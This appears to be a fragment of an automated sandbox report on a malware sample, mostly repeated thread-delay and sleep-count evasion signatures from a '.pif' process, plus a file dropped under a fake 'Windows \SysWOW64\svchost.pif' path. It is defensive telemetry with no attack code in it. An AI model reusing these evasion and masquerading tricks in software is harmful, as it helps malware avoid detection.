Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597081
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596839
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596584
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596468
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596359
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596250
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596140
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596031
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595922
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595594
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595484
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595364
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595250
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595140
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595031
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594922
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594812
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594703
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594374

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 2661	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 7092	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 5630
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 4109
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 4923
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Window / User API: threadDelayed 4926

Source: C:\Users\user\AppData\Local\Temp\x.exe

Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif

Jump to dropped file

Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599873s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1804	Thread sleep count: 2661 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1804	Thread sleep count: 7092 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599541s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599396s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599224s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -599104s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596682s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596576s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596465s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595592s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594861s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594475s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594368s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594242s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -594132s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -593799s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -593503s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -593306s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -593168s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -593034s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592787s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592648s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592506s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592315s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592141s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -592000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -591878s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -591741s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -591617s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856	Thread sleep time: -591362s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep count: 38 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599829s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1772	Thread sleep count: 5630 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1772	Thread sleep count: 4109 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599701s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599583s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599462s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599350s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599237s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -599016s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598872s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598725s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598591s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598443s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598284s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -598052s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -597567s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -597199s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -597035s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -596755s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -596605s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -596404s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -596252s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -596134s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595992s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595856s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595672s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595453s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595300s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -595176s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594804s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594691s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594567s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594442s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594317s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594192s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -594067s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593942s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593817s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593692s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593567s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593442s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593317s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593192s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -593067s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592942s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592817s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592704s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592567s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592442s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592317s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592191s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -592067s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591942s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591817s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591692s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591567s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591442s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591301s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591176s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -591051s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -590926s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -590801s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -590676s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608	Thread sleep time: -590551s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep count: 36 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 5052	Thread sleep count: 4923 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599890s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 5052	Thread sleep count: 4926 > 30
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598905s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598787s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598671s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598562s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598453s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598344s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598234s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598125s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -598015s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597906s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597771s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597656s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597546s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597437s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597319s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597203s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -597081s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596953s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596839s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596584s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596468s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596359s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596250s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596140s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -596031s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595922s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595812s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595703s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595594s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595484s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595364s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595250s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595140s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -595031s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594922s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594812s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594703s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594594s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594484s >= -30000s
Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836	Thread sleep time: -594374s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029C534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

1_2_029C534C

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599541	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599396	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599224	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596682	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594861	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594368	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594242	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594132	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593799	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593503	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593306	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593168	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593034	Jump to behavior
